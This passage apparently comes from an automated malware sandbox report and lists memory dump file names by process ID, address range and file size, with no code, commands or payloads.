  • memory/2956-187-0x0000000006A83000-0x0000000006A84000-memory.dmp
    Filesize

    4KB

  • memory/3080-115-0x0000000000000000-mapping.dmp
  • memory/3500-303-0x0000000000430000-0x000000000057A000-memory.dmp
    Filesize

    1.3MB

  • memory/3500-295-0x000000000041A684-mapping.dmp
  • memory/3800-264-0x0000000000590000-0x0000000000591000-memory.dmp
    Filesize

    4KB

  • memory/3800-287-0x0000000003560000-0x0000000003567000-memory.dmp
    Filesize

    28KB

  • memory/3800-233-0x0000000000000000-mapping.dmp
  • memory/3840-130-0x00000000007F0000-0x00000000007F1000-memory.dmp
    Filesize

    4KB

  • memory/3840-166-0x0000000007C50000-0x0000000007C51000-memory.dmp
    Filesize

    4KB

  • memory/3840-148-0x0000000006BA0000-0x0000000006BA1000-memory.dmp
    Filesize

    4KB

  • memory/3840-189-0x0000000002A23000-0x0000000002A24000-memory.dmp
    Filesize

    4KB

  • memory/3840-134-0x00000000007F0000-0x00000000007F1000-memory.dmp
    Filesize

    4KB

  • memory/3840-163-0x0000000007DC0000-0x0000000007DC1000-memory.dmp
    Filesize

    4KB

  • memory/3840-146-0x0000000002A22000-0x0000000002A23000-memory.dmp
    Filesize

    4KB

  • memory/3840-141-0x0000000002A20000-0x0000000002A21000-memory.dmp
    Filesize

    4KB

  • memory/3840-142-0x0000000007080000-0x0000000007081000-memory.dmp
    Filesize

    4KB

  • memory/3840-170-0x00000000007F0000-0x00000000007F1000-memory.dmp
    Filesize

    4KB

  • memory/3840-128-0x0000000000000000-mapping.dmp
  • memory/3868-307-0x0000000000000000-mapping.dmp
  • memory/3892-257-0x0000000000000000-mapping.dmp
  • memory/3892-282-0x00000000006A0000-0x00000000006A1000-memory.dmp
    Filesize

    4KB